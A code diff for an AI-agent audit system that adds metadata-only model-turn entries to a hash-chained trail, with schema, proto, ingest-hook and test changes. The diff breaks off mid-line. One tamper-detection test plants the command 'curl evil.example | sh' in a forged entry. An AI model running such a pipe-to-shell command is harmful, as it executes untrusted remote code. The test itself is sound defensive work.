diff --git a/Cargo.lock b/Cargo.lock index c9d2cc2..d564085 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -4,9 +4,9 @@ version = 4 [[package]] name = "acton-ai" -version = "0.35.0" +version = "0.36.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cdbcb4ac30042cb345d82528804d732545e4521e20bb9a9cba803659e99ddfd7" +checksum = "77e3170bd3121159fdc4cddb9c31619c8a1d308dd0a58144d263eb9983c17abb" dependencies = [ "acton-ai-macros", "acton-reactive", @@ -714,7 +714,7 @@ dependencies = [ "bitflags 2.13.1", "cexpr", "clang-sys", - "itertools 0.12.1", + "itertools 0.13.0", "log", "prettyplease", "proc-macro2", diff --git a/README.md b/README.md index 8ac7a11..fcf62bc 100644 --- a/README.md +++ b/README.md @@ -221,11 +221,21 @@ offline behavior, revocation, and audit recovery before enrolling developers. ## The audit record is evidence with explicit limits -Every tool call is appended to a BLAKE3-chained JSONL trail. Strict durability +Every attempted turn and every tool call is appended to a BLAKE3-chained JSONL +trail. A turn is recorded whether or not it called anything, so a session where +the model answered in text and used no tool still leaves a record. Turn entries +carry metadata only — outcome, prompt and response byte counts, provider, +model, token counts — and never the prompt or the answer. Strict durability waits for the append to reach disk and refuses further non-idempotent work after an audit failure. An anchor stored outside the trail detects deletion of its tail, which the chain alone cannot detect. +One gap remains: a turn that Garrison's own admission gates refuse — a lapsed +seat, an unreachable plane, a full shipping backlog — is turned away before the +model loop is entered, and nothing appends it to the trail. Closing that gap +needs a public append path on the audit writer, which the agent runtime does +not expose yet. + ```sh garrison-agent audit verify ``` diff --git a/agent/Cargo.toml b/agent/Cargo.toml index f6de577..ef508bb 100644 --- a/agent/Cargo.toml +++ b/agent/Cargo.toml @@ -6,7 +6,7 @@ license.workspace = true repository.workspace = true [dependencies] -acton-ai = { version = "=0.35.0", default-features = false, features = ["fips", "sandbox-hardening", "derive", "otel", "ipc"] } +acton-ai = { version = "=0.36.0", default-features = false, features = ["fips", "sandbox-hardening", "derive", "otel", "ipc"] } acton-reactive = "9.2.1" acton-service-client = "0.1.2" agent-client-protocol-schema = "1.6.0" diff --git a/agent/src/router.rs b/agent/src/router.rs index 9ca17b3..df27e10 100644 --- a/agent/src/router.rs +++ b/agent/src/router.rs @@ -471,7 +471,12 @@ fn configure_handlers(builder: &mut ManagedActor) { next = actor.model.settle(Some(turn_id.clone())); arm_expiry(actor, next.is_some()); } - TurnLifecycle::TurnRefused => { + // The refused turn's id is not read here on purpose. A turn + // acton-ai never admitted holds no claim to release, so there is + // nothing to settle *on*; settling on `None` simply lets the next + // waiter through. The id matters to the trail, which seals it, + // not to the router. + TurnLifecycle::TurnRefused { .. } => { next = actor.model.settle(None); arm_expiry(actor, next.is_some()); } diff --git a/agent/tests/audit_fixture.rs b/agent/tests/audit_fixture.rs index a954221..8b03271 100644 --- a/agent/tests/audit_fixture.rs +++ b/agent/tests/audit_fixture.rs @@ -21,7 +21,8 @@ //! `regenerate_the_frozen_audit_fixture` in `audit.rs`, where the daemon //! harness lives. Only for a break that has been decided on. -use acton_ai::audit::{parse_entries, verify_chain, ChainBreakKind}; +use acton_ai::audit::{parse_entries, verify_chain, AuditEntryKind, ChainBreakKind}; +use garrison_wire::audit::kind; /// The trail as the daemon sealed it, byte for byte. const FIXTURE: &str = include_str!("fixtures/audit-1.0/audit.jsonl"); @@ -86,7 +87,7 @@ fn an_edited_argument_breaks_the_chain_where_it_was_edited() { let target = entries .get_mut(1) .expect("the fixture holds more than one entry"); - target.arguments = serde_json::json!({ "path": "/edited/after/the/fact" }); + target.arguments = Some(serde_json::json!({ "path": "/edited/after/the/fact" })); let broken = verify_chain(&entries).expect_err("an edited entry must not verify"); @@ -115,3 +116,38 @@ fn dropping_the_last_entry_is_not_detectable_from_the_chain_alone() { // hour was deleted. Only a copy the machine cannot reach can, by holding // a head this one no longer matches. See `garrison_agent::shipping`. } + +#[test] +fn every_entry_the_1_0_daemon_wrote_still_reads_as_a_tool_call() { + // 1.1 added turn entries, distinguished by a discriminator that + // invocation entries omit. Omission is what kept the promise above: a + // field present on these lines would have changed their bytes, and their + // bytes are their hashes. So the rule "an entry that names no kind is a + // tool call" is not a convenience, it is the compatibility guarantee, and + // it is asserted here against the trail a 1.0 daemon actually wrote. + let entries = parse_entries(FIXTURE).expect("the frozen trail still parses"); + + for entry in &entries { + assert!( + entry.entry_kind.is_none(), + "a 1.0 entry names no kind: sequence {}", + entry.sequence, + ); + assert_eq!(kind(entry), AuditEntryKind::Invocation); + assert!( + entry.tool_name.is_some(), + "a 1.0 entry is an invocation and names its tool: sequence {}", + entry.sequence, + ); + assert!( + entry.turn_outcome.is_none(), + "a 1.0 entry carries none of the turn fields: sequence {}", + entry.sequence, + ); + } + + assert!( + !FIXTURE.contains("entry_kind"), + "the discriminator must not appear in bytes written before it existed", + ); +} diff --git a/agent/tests/session_persistence.rs b/agent/tests/session_persistence.rs index f22b9c6..0976c2b 100644 --- a/agent/tests/session_persistence.rs +++ b/agent/tests/session_persistence.rs @@ -530,10 +530,23 @@ async fn a_conversation_survives_the_daemon_that_opened_it() { trail.contains(&chain_head), "the first daemon's head must still be in the chain the second extended", ); + // One tool call and one turn apiece. The turn entries are what make a + // prompt-only turn visible at all, so a count that only tallied tool calls + // would stop noticing if they ever went missing again. + let kinds: Vec = trail + .lines() + .map(|line| { + let entry: Value = serde_json::from_str(line).expect("every trail line is an entry"); + entry["entry_kind"] + .as_str() + .unwrap_or("invocation") + .to_string() + }) + .collect(); assert_eq!( - trail.lines().count(), - 2, - "one entry per tool call, across both daemons: {trail}", + kinds, + ["invocation", "turn", "invocation", "turn"], + "one tool call and one turn per daemon, in the order they happened: {trail}", ); drop(client); diff --git a/docs/compatibility.md b/docs/compatibility.md index 9459a0f..dfb85d0 100644 --- a/docs/compatibility.md +++ b/docs/compatibility.md @@ -77,6 +77,21 @@ holds a trail a real daemon wrote and fails if today's code disagrees with it about a single byte. Regenerating that fixture is the visible cost of breaking this promise, and it is deliberately awkward. +**Added in 1.1, without moving a byte:** the trail now also holds one entry per +attempted *turn*, not only per tool invocation. A turn entry is a new shape in +the same chain, distinguished by an `entry_kind` field that invocation entries +omit — and omission is the whole trick. Every field a turn entry adds, and the +discriminator itself, is absent from an invocation's serialized form and from +its hash pre-image, so a trail written by 1.0 still hashes to exactly what it +hashed to. `agent/tests/audit_fixture.rs` is what holds that claim honest: it +verifies a trail a 1.0 daemon wrote, unchanged. + +A reader that does not know about turn entries will still verify the chain, +because verification is over the sealed bytes. It will simply see entries whose +tool fields are absent. Code that reads those fields must treat them as +optional; in this repo, `garrison_wire::audit::kind` is the one place that +decides which kind an entry is, and an entry that names no kind is a tool call. + Note what the chain does *not* promise, and never did: a prefix of a valid chain is itself a valid chain, so truncation of the most recent entries is undetectable from the file alone. That is why the trail ships off the box. @@ -91,7 +106,7 @@ the next rebuild picks a change up silently. | Crate | Requirement | Why | | --- | --- | --- | -| `acton-ai` | `=0.35.0` (exact) | It is 0.x, and `garrison-wire` re-exports its audit types as Garrison's own wire contract. An unreviewed 0.36 would silently redefine what an audit entry is, which is surface 4 above. Exact makes the bump a reviewed commit. | +| `acton-ai` | `=0.36.0` (exact) | It is 0.x, and `garrison-wire` re-exports its audit types as Garrison's own wire contract. An unreviewed bump would silently redefine what an audit entry is, which is surface 4 above. Exact makes it a reviewed commit — as 0.35 → 0.36 was: it turned the tool fields optional to make room for turn entries, and the fixture test is what proved no existing byte moved. | | `acton-service` | `0.39` | Plane-side only (`hooks-service`). For a 0.x crate, caret already caps below 0.40, so caret and tilde are the same requirement here. | | `acton-service-client` | `0.1.2` | Ships inside the agent binary, so a fix here needs an agent release, not just a plane redeploy. | | `acton-reactive` | `9.2.1` | Post-1.0 semver, patch float. | diff --git a/docs/control-plane.md b/docs/control-plane.md index e1e3069..cdcfba2 100644 --- a/docs/control-plane.md +++ b/docs/control-plane.md @@ -891,7 +891,7 @@ cache buys availability, not integrity. | Schema | What it answers | |---|---| | `AuditTrail` | What the install says about its own trail: local head, shipped through | -| `AuditEvent` | One entry from an install's BLAKE3 chain, the sealed line verbatim | +| `AuditEvent` | One entry from an install's BLAKE3 chain — a turn or a tool call — the sealed line verbatim | | `AuditChain` | Where the plane has verified a trail's chain to, and whether it holds | The agent keeps a hash-chained JSONL trail locally; acton-ai seals every entry @@ -918,6 +918,37 @@ and may change; the verbatim entry may not. `session` is optional: a trail belongs to an install, and an entry can be sealed before any session is known to the plane. `trail` is required. +`kind` says which of two things an entry is, and the distinction matters more +than it looks. A `tool_call` row is one invocation: what ran, with what +arguments, decided by which gate. A `turn` row is one attempted model turn, +sealed whether or not that turn called anything. Without it the export answers +"what did this install run" and never "what did this install ask" — a session +where the model produced code and called no tool left no row at all, and a +compliance regime that specifies audit logging as *user activity* would have +been reading a trail that quietly only covered half of it. + +A `turn` row carries metadata and no content: `prompt_bytes`, +`response_bytes`, `input_tokens`, `output_tokens`, `provider`, and `model`. +The byte counts answer the user/timestamp/activity/response-length question +without copying a prompt or an answer into a trail that leaves the workstation +and lands in a SIEM. There is no column for prompt text; adding one would be a +decision about retention rather than about auditing, and it is not made here. + +`decision` and `decider` mean the approval gate on a `tool_call` row and the +*admission* gate on a `turn` row: a turn that ran was let through +(`auto_approved` / `default`) and a turn that did not was refused +(`forbidden` / `policy`), with the rendered reason in `justification`. +Admission is a gate in exactly the sense approval is, so a turn fills the same +columns rather than needing its own. A refused turn has no `outcome`, for the +same reason a denied call has none: it never ran. `sandboxed` is written +`false` on every turn row rather than inheriting the schema's `default(true)`, +because a turn confines nothing. + +The ingest hook re-derives every one of those columns, turn columns included. +An install that could set its own `kind` could file a turn as a tool call and +vanish from a turn-level export; one that could set its own token counts could +under-report what it spent. + `AuditChain` is the plane's answer, one per trail rather than one per session. Only the `audit_service` role writes it. The `before_validate` hook on `AuditEvent`, bound in `config.toml` with `required = true`, loads the chain diff --git a/hooks-service/proto/audit_event_hooks.proto b/hooks-service/proto/audit_event_hooks.proto index 7d0fca9..19b5e72 100644 --- a/hooks-service/proto/audit_event_hooks.proto +++ b/hooks-service/proto/audit_event_hooks.proto @@ -38,6 +38,12 @@ message AuditEventBeforeValidateRequest { optional string command_rule = 121; optional string tool_rule = 122; optional string detail = 123; + optional string provider = 124; + optional string model = 125; + optional int64 prompt_bytes = 126; + optional int64 response_bytes = 127; + optional int64 input_tokens = 128; + optional int64 output_tokens = 129; } message AuditEventBeforeValidateResponse { @@ -66,5 +72,11 @@ message AuditEventBeforeValidateResponse { optional string command_rule = 121; optional string tool_rule = 122; optional string detail = 123; + optional string provider = 124; + optional string model = 125; + optional int64 prompt_bytes = 126; + optional int64 response_bytes = 127; + optional int64 input_tokens = 128; + optional int64 output_tokens = 129; } diff --git a/hooks-service/src/hooks/audit_event.rs b/hooks-service/src/hooks/audit_event.rs index 184100b..46443c2 100644 --- a/hooks-service/src/hooks/audit_event.rs +++ b/hooks-service/src/hooks/audit_event.rs @@ -45,8 +45,9 @@ use std::collections::BTreeMap; use chrono::{SecondsFormat, Utc}; use garrison_wire::audit::{ - command_of, decider_of, decision_of, outcome_of, projection_disagreement, verify_next, - AuditEntry, ChainBreakKind, ChainHead, EventProjection, GENESIS_HASH, INGEST_UNAVAILABLE, + command_of, decider_of, decision_of, kind_column, outcome_of, projection_disagreement, + refusal_reason, truncate, verify_next, AuditEntry, ChainBreakKind, ChainHead, EventProjection, + GENESIS_HASH, INGEST_UNAVAILABLE, REASON_MAX, }; use serde_json::{json, Value}; use tonic::{Request, Response, Status}; @@ -243,42 +244,84 @@ pub fn verified_after(previous: Option<&AuditChainRow>, integrity: &str, head_se /// The columns the hook re-derives from the sealed entry rather than trusting. #[derive(Clone, Debug, PartialEq, Eq)] pub struct Derived { - /// Always `tool_call` for 1.0: acton-ai seals one entry per invocation. + /// What the entry is: `tool_call` for one invocation, `turn` for one + /// attempted model turn. Read from the entry's own discriminator, which + /// an invocation omits. pub kind: &'static str, - /// The tool the entry names. + /// The tool the entry names, empty on a turn. pub tool_name: String, /// The shell command, empty for every other tool. /// /// Empty rather than absent so a fabricated command is erased: an unset /// optional in the hook response leaves whatever the client sent. pub command: String, - /// How the call was decided. + /// How the call, or the turn, was decided. pub decision: &'static str, /// Which gate decided it. pub decider: &'static str, - /// What the call came to, absent for a call that never ran. + /// The rendered reason a refusal came with, empty when there was none. + /// + /// Empty for the same reason `command` is: an install that could write + /// this column freely could explain away its own refusals. + pub justification: String, + /// What it came to, absent for a call or a turn that never ran. pub outcome: Option<&'static str>, /// When it happened, as the entry recorded it. pub occurred_at: String, - /// How long it took. + /// How long it took. Zero on a turn, which records no duration. pub elapsed_ms: i64, + /// The provider billed for a turn, empty on a tool call. + pub provider: String, + /// The model a turn ran against, empty on a tool call. + pub model: String, + /// Prompt length in bytes, zero when the entry records none. + pub prompt_bytes: i64, + /// Response length in bytes, zero when the entry records none. + pub response_bytes: i64, + /// Input tokens summed across the turn. + pub input_tokens: i64, + /// Output tokens summed across the turn. + pub output_tokens: i64, } /// Re-derive every column that is a function of the sealed entry. Pure. +/// +/// Every field here is written back over whatever the client sent. The turn +/// columns are derived for the same reason the tool columns always were: an +/// install that could set its own token counts could under-report what it +/// spent, and one that could set `kind` could file a turn as a tool call and +/// disappear from a turn-level export. #[must_use] pub fn derive(entry: &AuditEntry) -> Derived { Derived { - kind: "tool_call", - tool_name: entry.tool_name.clone(), + kind: kind_column(entry), + tool_name: entry.tool_name.clone().unwrap_or_default(), command: command_of(entry).unwrap_or_default(), decision: decision_of(entry), - decider: decider_of(entry.decision), - outcome: outcome_of(&entry.outcome), + decider: decider_of(entry), + justification: refusal_reason(entry) + .map(|reason| truncate(reason, REASON_MAX)) + .unwrap_or_default(), + outcome: outcome_of(entry), occurred_at: entry.timestamp.clone(), - elapsed_ms: i64::try_from(entry.duration_ms).unwrap_or(i64::MAX), + elapsed_ms: count(entry.duration_ms), + provider: entry.provider.clone().unwrap_or_default(), + model: entry.model.clone().unwrap_or_default(), + prompt_bytes: count(entry.prompt_size_bytes), + response_bytes: count(entry.response_size_bytes), + input_tokens: count(entry.input_tokens), + output_tokens: count(entry.output_tokens), } } +/// One optional count as the column carries it. Pure. +/// +/// Absent becomes zero rather than being left unset, so a count the client +/// invented for an entry that records none is erased instead of surviving. +fn count(value: Option) -> i64 { + value.map_or(0, |value| i64::try_from(value).unwrap_or(i64::MAX)) +} + /// The one derived column the hook can refuse but cannot correct. Pure. /// /// `outcome` is an enum, so there is no value that means "nothing happened"; @@ -516,9 +559,16 @@ fn accept( command: Some(derived.command.clone()), decision: Some(derived.decision.to_string()), decider: Some(derived.decider.to_string()), + justification: Some(derived.justification.clone()), outcome: derived.outcome.map(ToString::to_string), occurred_at: Some(derived.occurred_at.clone()), elapsed_ms: Some(derived.elapsed_ms), + provider: Some(derived.provider.clone()), + model: Some(derived.model.clone()), + prompt_bytes: Some(derived.prompt_bytes), + response_bytes: Some(derived.response_bytes), + input_tokens: Some(derived.input_tokens), + output_tokens: Some(derived.output_tokens), ..Default::default() } } @@ -547,7 +597,9 @@ fn abort(reason: &str) -> AuditEventBeforeValidateResponse { #[cfg(test)] mod tests { use super::*; - use garrison_wire::audit::{fixture, AuditDecision, AuditOutcome, Decider, TrailId}; + use garrison_wire::audit::{ + fixture, AuditDecision, AuditOutcome, Decider, TrailId, TurnAuditOutcome, + }; /// A fresh trail identity. Reached through `garrison-wire`, like every /// other acton-ai type this crate touches: the hook service does not @@ -686,7 +738,7 @@ mod tests { let chain = chain_row(1, &entries[0].hash); // Edit the entry after sealing: the hash it carries is now a lie, and // the sequence check would otherwise have stopped before the hash one. - entries[4].tool_name = "rm".to_string(); + entries[4].tool_name = Some("rm".to_string()); let projection = projection_of(&entries[4], &trail.install); let verdict = adjudicate_entry(Some(&chain), None, &trail, &entries[4], &projection); @@ -935,6 +987,126 @@ mod tests { assert!(uncorrectable(&derived, Some("")).is_none()); } + #[test] + fn a_turn_entry_derives_a_turn_row_and_names_no_tool() { + let id = trail_id(); + let entry = fixture::turn(1, GENESIS_HASH, Some(&id), TurnAuditOutcome::Completed); + + let derived = derive(&entry); + + assert_eq!(derived.kind, "turn"); + assert_eq!(derived.tool_name, ""); + assert_eq!(derived.command, ""); + assert_eq!(derived.decision, "auto_approved"); + assert_eq!(derived.decider, "default"); + assert_eq!(derived.outcome, Some("success")); + assert_eq!(derived.provider, "anthropic"); + assert_eq!(derived.model, "claude-opus-5"); + assert_eq!(derived.prompt_bytes, 64); + assert_eq!(derived.response_bytes, 512); + assert_eq!(derived.input_tokens, 900); + assert_eq!(derived.output_tokens, 120); + } + + #[test] + fn a_refused_turn_derives_a_refusal_and_carries_its_reason() { + let id = trail_id(); + let entry = fixture::turn( + 1, + GENESIS_HASH, + Some(&id), + TurnAuditOutcome::Refused { + decision: "draining".into(), + reason: "the daemon is draining".into(), + }, + ); + + let derived = derive(&entry); + + assert_eq!(derived.decision, "forbidden"); + assert_eq!(derived.decider, "policy"); + assert_eq!(derived.justification, "the daemon is draining"); + assert_eq!(derived.outcome, None); + } + + #[test] + fn an_outcome_claimed_for_a_turn_that_never_ran_is_refused() { + // The same rule the denied tool call gets: a row saying a refused turn + // succeeded is claiming a provider round that was never paid for. + let id = trail_id(); + let entry = fixture::turn( + 1, + GENESIS_HASH, + Some(&id), + TurnAuditOutcome::Refused { + decision: "paused".into(), + reason: "admission is paused".into(), + }, + ); + let derived = derive(&entry); + + assert!(uncorrectable(&derived, Some("success")).is_some()); + assert!(uncorrectable(&derived, None).is_none()); + } + + #[test] + fn a_tool_call_derives_none_of_the_turn_columns() { + // Empty and zero rather than unset: an unset optional in the response + // leaves whatever the client sent, so an install could otherwise + // decorate a tool call with invented token counts. + let id = trail_id(); + let entries = fixture::chain(1, &id); + + let derived = derive(&entries[0]); + + assert_eq!(derived.kind, "tool_call"); + assert_eq!(derived.provider, ""); + assert_eq!(derived.model, ""); + assert_eq!(derived.prompt_bytes, 0); + assert_eq!(derived.input_tokens, 0); + assert_eq!(derived.output_tokens, 0); + assert_eq!(derived.justification, ""); + } + + #[test] + fn a_turn_row_overwrites_every_count_the_client_sent() { + let id = trail_id(); + let entry = fixture::turn(1, GENESIS_HASH, Some(&id), TurnAuditOutcome::Completed); + let trail = trail_row(&id); + + let response = accept(&trail, "operator_01", &derive(&entry)); + + assert_eq!(response.kind.as_deref(), Some("turn")); + assert_eq!(response.input_tokens, Some(900)); + assert_eq!(response.output_tokens, Some(120)); + assert_eq!(response.prompt_bytes, Some(64)); + assert_eq!(response.response_bytes, Some(512)); + assert_eq!(response.model.as_deref(), Some("claude-opus-5")); + } + + #[test] + fn a_turn_entry_adjudicates_on_the_chain_like_any_other() { + // Turn and invocation entries share one chain, so the ingest must + // link them together rather than treating a turn as an interloper. + let id = trail_id(); + let entries = fixture::mixed_chain(2, &id); + let trail = trail_row(&id); + let chain = chain_row(1, &entries[0].hash); + + let verdict = adjudicate_entry( + Some(&chain), + None, + &trail, + &entries[1], + &projection_of(&entries[1], &trail.install), + ); + + assert!( + matches!(&verdict, Verdict::Accept { head_seq, .. } if *head_seq == 2), + "{verdict:?}" + ); + } + #[test] fn an_update_is_refused_because_the_trail_is_append_only() { let response = abort(APPEND_ONLY); diff --git a/hooks-service/tests/audit_shipping.rs b/hooks-service/tests/audit_shipping.rs index ff44449..94fddf6 100644 --- a/hooks-service/tests/audit_shipping.rs +++ b/hooks-service/tests/audit_shipping.rs @@ -44,7 +44,9 @@ const ADMIN_USER: &str = "admin"; const ADMIN_PASSWORD: &str = "garrison-test-admin"; const ISSUER: &str = "garrison-control-plane"; const OPERATOR_UPN: &str = "shipper@example-agency.gov"; -const ENTRIES: u64 = 5; +/// Three turns, each with one tool call: a trail of both kinds, which is +/// the only shape that proves a prompt-only turn survives the trip too. +const ENTRIES: u64 = 6; /// A child process that dies with the test, whichever way the test ends. struct Reaped(Child, &'static str); @@ -531,7 +533,7 @@ async fn sealed_entries_ship_into_a_real_plane_and_the_chain_head_matches() { }; let trail_id = TrailId::new(); - let entries = fixture::chain(ENTRIES, &trail_id); + let entries = fixture::mixed_chain(ENTRIES / 2, &trail_id); let trail = daemon .create( "AuditTrail", @@ -604,7 +606,51 @@ async fn sealed_entries_ship_into_a_real_plane_and_the_chain_head_matches() { "the plane's head must be re-derivable from the plane's own rows" ); - // 4. Attribution came from the install, not from the daemon: the + // 4. Both kinds landed as themselves. A turn row carries the metadata + // that makes a prompt-only turn legible to an auditor, and none of the + // tool-call columns; a tool-call row is unchanged by any of this. + let mut by_kind: Vec<(&str, &Value)> = stored + .iter() + .map(|row| { + ( + row["fields"]["kind"] + .as_str() + .expect("every row names a kind"), + &row["fields"], + ) + }) + .collect(); + by_kind.sort_by_key(|(_, fields)| fields["chain_seq"].as_i64().expect("chain_seq")); + let turns: Vec<&&Value> = by_kind + .iter() + .filter(|(kind, _)| *kind == "turn") + .map(|(_, fields)| fields) + .collect(); + assert_eq!( + turns.len(), + (ENTRIES / 2) as usize, + "one turn row per turn: {by_kind:?}", + ); + for fields in turns { + // The plane renders an unset optional text column as the empty + // string rather than null, so "no tool" is either. + let unset = |value: &Value| value.is_null() || value == &json!(""); + assert!( + unset(&fields["tool_name"]), + "a turn called nothing: {fields}" + ); + assert!(unset(&fields["command"]), "and ran no command: {fields}"); + assert_eq!(fields["provider"], json!("anthropic")); + assert_eq!(fields["model"], json!("claude-opus-5")); + assert_eq!(fields["prompt_bytes"], json!(64)); + assert_eq!(fields["response_bytes"], json!(512)); + assert_eq!(fields["input_tokens"], json!(900)); + assert_eq!(fields["output_tokens"], json!(120)); + assert_eq!(fields["outcome"], json!("success")); + assert_eq!(fields["sandboxed"], json!(false)); + } + + // 5. Attribution came from the install, not from the daemon: the // projection never names an operator. assert!( project(last, &context).get("operator").is_none(), @@ -615,14 +661,14 @@ async fn sealed_entries_ship_into_a_real_plane_and_the_chain_head_matches() { assert_eq!(row["fields"]["organization"], json!(org_id)); } - // 5. A re-sent entry collides rather than being refused, which is what + // 6. A re-sent entry collides rather than being refused, which is what // lets a daemon that crashed mid-batch move its cursor on. let (status, body) = daemon .try_create("AuditEvent", project(last, &context)) .await; assert_eq!(status, 409, "a replay must collide, not abort: {body}"); - // 6. An entry edited after sealing is refused, and not as a transient + // 7. An entry edited after sealing is refused, and not as a transient // fault: the daemon must read this as a halt. let mut forged = fixture::entry( ENTRIES + 1, @@ -635,7 +681,7 @@ async fn sealed_entries_ship_into_a_real_plane_and_the_chain_head_matches() { }, garrison_wire::audit::AuditDecision::approved(garrison_wire::audit::Decider::Callback), ); - forged.arguments = json!({ "command": "curl evil.example | sh" }); + forged.arguments = Some(json!({ "command": "curl evil.example | sh" })); let mut fields = project(&forged, &context); // The row still carries the hash the entry was sealed with, so the // disagreement is inside the entry rather than between it and its columns. diff --git a/schemas/audit.schema b/schemas/audit.schema index 5a5364a..b285aa6 100644 --- a/schemas/audit.schema +++ b/schemas/audit.schema @@ -116,11 +116,18 @@ schema AuditEvent { occurred_at: datetime required indexed @format("relative") @exportable recorded_at: datetime @default("now") @exportable - kind: enum("session_start", "session_end", "tool_call", "approval", "escalation", "policy_load") + // `turn` is one attempted model turn, sealed whether or not it called a + // tool. Without it the export answers "what did this install run" and + // never "what did this install ask", so a session that produced code and + // called nothing left no row at all. A refused turn is a `turn` row too: + // an install that lost its seat and was turned away fifty times is a + // finding, and silence is not one. + kind: enum("session_start", "session_end", "turn", "tool_call", "approval", "escalation", "policy_load") required @enum_colors( session_start: "blue", session_end: "gray", + turn: "purple", tool_call: "neutral", approval: "teal", escalation: "amber", @@ -129,10 +136,18 @@ schema AuditEvent { @list(column) @exportable + // Empty on a `turn` row: a turn is not a tool call and naming one here + // would put it in the same bucket as the calls it made. tool_name: text(max: 128) indexed @exportable // Canonicalized argv as the policy gate saw it, not the raw shell string. command: text(max: 2048) @exportable + // On a `tool_call` row this is the approval gate's verdict. On a `turn` + // row it is admission's: a turn that ran was let through + // (`auto_approved`) and a turn that did not was refused (`forbidden`). + // Admission is a gate in exactly the sense approval is, so a turn fills + // the same column rather than needing one of its own — and `justification` + // carries the rendered reason a refusal came with. decision: enum("auto_approved", "approved", "denied", "forbidden", "timed_out") required @enum_colors( @@ -146,17 +161,23 @@ schema AuditEvent { @exportable // Which gate produced the verdict, and the identity behind it when a human - // was in the loop. + // was in the loop. Admission is never a person — nobody is prompted to let + // a turn start — so a refused turn reads `policy` and an admitted one + // reads `default`. decider: enum("policy", "callback", "operator", "default") required @exportable decided_by: text(max: 320) @exportable justification: text(max: 1024) @exportable + // Absent on a refused `tool_call` and on a refused `turn` alike: neither + // ran, and recording `error` for a refusal would file it beside a failure. outcome: enum("success", "error", "aborted") @enum_colors(success: "green", error: "red", aborted: "gray") @exportable + // False on every `turn` row. The daemon writes it explicitly rather than + // inheriting this default, because a turn confines nothing. sandboxed: boolean default(true) @exportable // Milliseconds, lifted from the entry's `duration_ms`. An integer rather // than a `duration` because the hook proto generator cannot carry a @@ -170,6 +191,28 @@ schema AuditEvent { // Free-form payload. Deliberately not @exportable: a bulk file is the // wrong place for whatever a tool happened to attach. detail: json + + // What a `turn` row adds, and only a `turn` row fills. + // + // Metadata, deliberately and permanently. Byte counts make user activity + // and response length auditable — which is the shape a compliance regime + // actually asks for — without copying a prompt or an answer into a trail + // that leaves the workstation and lands in a SIEM. There is no column here + // for prompt text, and adding one would be a decision about retention + // rather than about auditing. + // + // Appended after `detail` rather than filed beside the columns they read + // with, because the hook proto numbers its fields in declaration order: a + // field inserted in the middle renumbers every field after it, and a + // renumbered tag is a wire break for any plane still holding the old + // descriptor. + provider: text(max: 64) @exportable + model: text(max: 128) indexed @exportable + prompt_bytes: integer(min: 0) @exportable + // Also filled on a `tool_call` row, from the entry's serialized result. + response_bytes: integer(min: 0) @exportable + input_tokens: integer(min: 0) @exportable + output_tokens: integer(min: 0) @exportable } // Per-trail chain state as the plane verified it, maintained by the audit diff --git a/wire/Cargo.toml b/wire/Cargo.toml index 5608434..4f6cfdd 100644 --- a/wire/Cargo.toml +++ b/wire/Cargo.toml @@ -6,7 +6,7 @@ license.workspace = true repository.workspace = true [dependencies] -acton-ai = { version = "=0.35.0", default-features = false } +acton-ai = { version = "=0.36.0", default-features = false } base64 = "0.23.1" ed25519-dalek = { version = "3.0.0", features = ["pkcs8", "pem"] } serde = { version = "1.0.229", features = ["derive"] } diff --git a/wire/src/audit.rs b/wire/src/audit.rs index 6c27e7d..9e6def2 100644 --- a/wire/src/audit.rs +++ b/wire/src/audit.rs @@ -15,6 +15,22 @@ //! compares. Two implementations of that mapping would eventually differ, and //! the difference would read as tampering. //! +//! # Two kinds, one row shape +//! +//! A trail holds two kinds of entry: one per tool invocation, and one per +//! attempted model turn — sealed whether or not that turn called anything. +//! [`kind`] is the single place that decides which is which, and it answers +//! "invocation" for an entry that names no kind at all, because that is +//! exactly what every entry written before turns were recorded looks like. +//! Absence is the compatibility guarantee, not an oversight: a discriminator +//! present on those lines would have changed their bytes, and their bytes are +//! their hashes. +//! +//! The two kinds project into the same row, filling barely overlapping +//! columns. One table is what lets an auditor ask what an install did in a +//! window and get an answer that includes the turns where the model only +//! talked. +//! //! # What is not projected //! //! `operator` and `organization` are absent on purpose. An install must not @@ -22,12 +38,20 @@ //! `AgentInstall` row the trail belongs to, exactly as the enrollment hook //! fills `organization` on a redemption. A field the client cannot set is a //! field the client cannot forge. +//! +//! Prompt and response *content* is absent for a different reason: acton-ai +//! never seals it. A turn entry carries byte counts, which answer the +//! activity-and-response-length question a compliance regime actually asks, +//! without copying what a developer typed into a trail that leaves the +//! workstation and lands in a SIEM. // Re-exported rather than merely used: the ingest hook has to deserialize the // same sealed entry the daemon serialized, and a service that reached for // `acton_ai` itself would be a second, independently versioned definition of // what an entry is. One crate names the type; both ends read it from there. -pub use acton_ai::audit::{AuditDecision, AuditEntry, AuditOutcome}; +pub use acton_ai::audit::{ + AuditDecision, AuditEntry, AuditEntryKind, AuditOutcome, TurnAuditOutcome, +}; pub use acton_ai::policy::Decider; pub use acton_ai::types::TrailId; use serde::{Deserialize, Serialize}; @@ -52,6 +76,11 @@ pub const INGEST_UNAVAILABLE: &str = "audit ingest temporarily unavailable"; /// losing the entry. pub const COMMAND_MAX: usize = 2048; +/// The longest a projected `justification` may be, matching +/// `text(max: 1024)` on the schema. A refusal reason is prose written by a +/// gate, so it is clipped for the same reason a command is. +pub const REASON_MAX: usize = 1024; + /// The suffix a truncated command carries, so a reader can tell. pub const TRUNCATED: &str = "…"; @@ -86,6 +115,12 @@ pub struct ProjectionContext { /// /// Pure: the same entry in the same context always produces the same body, /// which is what lets the ingest hook recompute it and compare. +/// +/// Both entry kinds project into the same row shape. The columns an +/// invocation fills and the columns a turn fills barely overlap, but a single +/// table is what lets an auditor ask "what did this install do between these +/// two timestamps" and get an answer that includes the turns where the model +/// only talked. #[must_use] pub fn project(entry: &AuditEntry, context: &ProjectionContext) -> Value { let mut fields = Map::new(); @@ -102,36 +137,114 @@ pub fn project(entry: &AuditEntry, context: &ProjectionContext) -> Value { ); fields.insert("occurred_at".into(), json!(entry.timestamp)); - fields.insert("kind".into(), json!("tool_call")); - fields.insert("tool_name".into(), json!(entry.tool_name)); - if let Some(command) = command_of(entry) { - fields.insert("command".into(), json!(command)); - } - + fields.insert("kind".into(), json!(kind_column(entry))); fields.insert("decision".into(), json!(decision_of(entry))); - fields.insert("decider".into(), json!(decider_of(entry.decision))); - if let Some(outcome) = outcome_of(&entry.outcome) { + fields.insert("decider".into(), json!(decider_of(entry))); + if let Some(outcome) = outcome_of(entry) { fields.insert("outcome".into(), json!(outcome)); } + if let Some(bytes) = entry.response_size_bytes { + fields.insert("response_bytes".into(), 